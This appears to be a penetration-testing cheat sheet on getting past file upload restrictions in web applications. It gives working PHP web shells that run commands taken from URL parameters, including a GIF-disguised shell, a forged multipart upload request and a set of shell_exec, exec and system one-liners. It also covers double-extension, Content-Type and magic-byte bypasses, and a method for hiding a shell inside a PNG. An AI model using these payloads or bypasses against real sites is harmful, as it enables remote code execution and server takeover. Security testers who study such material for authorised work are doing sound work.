File Upload Tricks
When uploading files , check for validation on :
File extension
Server side extension allowed ? :
php phtml php4
Stacking / Double Extension
.php.png .%20.php
Using gif (shell.php)
GIF89a;
<?php
system($_GET['cmd']);
?>
Advanced gif
Content-Disposition: form-data; name="upload"; filename="web.php"
Content-Type: image/png
GIF89a;
<?php
system($_GET['cmd']);
?>
Content-Type header
Is server extension like php able to bypass the upload restriction ?
- If yes , just change content-type header to like image and it will still run as php.
Does the server validate content-type header like disallow application/json?
Magic bytes (file hex value)
Does the server check file signature ?
If no , can change file signature using
hexedit
PHP Function Exploit
imagecopyresampled
imagecreatefromstring

solution :Hide the webshell in the IDAT chunk of PNG
https://github.com/huntergregal/PNG-IDAT-Payload-Generator/tree/master
python3 generate.py -m php -o webshell.png
Rename to webshell.png.php
Shell exec
php
shell_exec() , exec() , system()
Examples
<?php echo shell_exec($_GET['command']); ?>
<?php echo exec($_GET['command']); ?>
<?php echo system($_GET['command']); ?>
<?php echo exec($_GET['e'].' 2>&1'); ?>
<?php system($_GET['e'].' 2>&1'); ?>
<?php echo shell_exec($_GET['e'].' 2>&1'); ?>
Content-Types of Common Files
Pictures :
image/png
image/jpeg
image/gif
JSON :
application/json
PHP :
application/x-php
application/x-www-form-urlencoded
multipart/form-data
application/octet-stream
TXT :
text/plain
XML :
application/xml
text/xml
HTML :
text/html
JAVASCRIPT :
text/javascript
application/javascript
PDF
application/pdf
AUDIO
audio/mpeg
audio/wav
VIDEO
video/mp4
video/quicktime
Last updated
Was this helpful?